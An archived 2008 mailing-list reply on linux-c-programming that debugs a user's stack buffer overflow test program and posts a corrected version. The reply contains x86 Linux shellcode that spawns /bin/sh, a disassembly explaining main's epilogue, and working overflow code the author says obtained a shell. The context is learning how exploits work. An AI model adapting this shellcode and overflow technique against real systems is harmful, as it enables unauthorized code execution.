[flat|nested] 11+ messages in thread
* Re: buffer overflow @ 2008-03-17 8:28 nai.xia 0 siblings, 0 replies; 11+ messages in thread From: nai.xia @ 2008-03-17 8:28 UTC (permalink / raw) To: linux-c-programming ----- Forwarded message from nai.xia@gmail.com ----- Date: Mon, 17 Mar 2008 16:19:40 +0800 From: nai.xia@gmail.com Subject: Re: buffer overflow To: Varun Chandramohan <varunc@linux.vnet.ibm.com> I think there are three errors in your testing program. On Tue, Mar 11, 2008 at 11:38:38AM +0530, Varun Chandramohan wrote: > Hi all, > > Can someone tell me whats is wrong with this program? All i > get is seg fault. Iam trying to create a stack overflow and exec a > shell. Somehow its not working. The system is x86 on linux. > gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52) > Copyright (C) 2006 Free Software Foundation, Inc. > This is free software; see the source for copying conditions. There is NO > warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. > > > > The Code: > #include <stdio.h> > #include <string.h> > > char shellcode[] = > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > "\x80\xe8\xdc\xff\xff\xff/bin/sh"; I disassembled the shellcode and I don't think it is valid. > #if 0 > char shellcode[] = > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; > > #endif > > char large_string[128]; the string is not _large_ enough. in my Linux box, it takes about 132 bytes from buffer to return address,which means, you just filled part of the stack with junk bytes after large_string+127 instead of &buffer > int main() { > char buffer[96]; > int i; > long *long_ptr = (long *) large_string; > memset(&buffer,0,sizeof(buffer)); > > for (i = 0; i < 32; i++) > *(long_ptr + i) = (long)&buffer; > > for (i = 0; i < strlen(shellcode); i++) > large_string[i] = shellcode[i]; > > strcpy(buffer,large_string); > } the return behavior of "main" is somewhat different from any other plain functons. And below is taken from my program. 804846f: e8 cc fe ff ff call 8048340 <strcpy@plt> 8048474: 83 ec 80 sub $0xffffff80,%esp 8048477: 59 pop %ecx 8048478: 5b pop %ebx 8048479: 5d pop %ebp 804847a: 8d 61 fc lea -0x4(%ecx),%esp 804847d: c3 ret We can see that it's not direct "pop" of the stack, the stack is adjusted with "lea" just before the "ret", so your shellcode address is not filled into the "eip" but to "esp"! And at last, here is my modified version (sucessfully got a shell in my box) of your test program: #include <stdio.h> #include <string.h> char shellcode[] = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80" "\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; #if 0 char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; #endif char large_string[256]; int foo() { char buffer[96]; int i; long *long_ptr = (long *) large_string; memset(&buffer,0,sizeof(buffer)); for (i = 0; i < 256/4; i++) *(long_ptr + i) = (long)&buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } int main() { foo(); } > > -- > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html ----- End forwarded message ----- ^ permalink raw reply [flat|nested] 11+ messages in thread
end of thread, other threads:[~2008-03-17 8:28 UTC | newest]
Thread overview: 11+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2008-03-11 6:08 buffer overflow Varun Chandramohan
2008-03-11 8:33 ` Patrik Båt, RTL
2008-03-11 10:04 ` Patrik Båt, RTL
2008-03-11 10:41 ` Varun Chandramohan
2008-03-11 12:04 ` Patrik Båt, RTL
2008-03-11 12:12 ` ninjaboy
2008-03-11 13:24 ` Varun Chandramohan
[not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com>
2008-03-12 4:28 ` Varun Chandramohan
2008-03-11 18:32 ` vincent-perrier
2008-03-12 4:29 ` Varun Chandramohan
-- strict thread matches above, loose matches on Subject: below --
2008-03-17 8:28 nai.xia
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).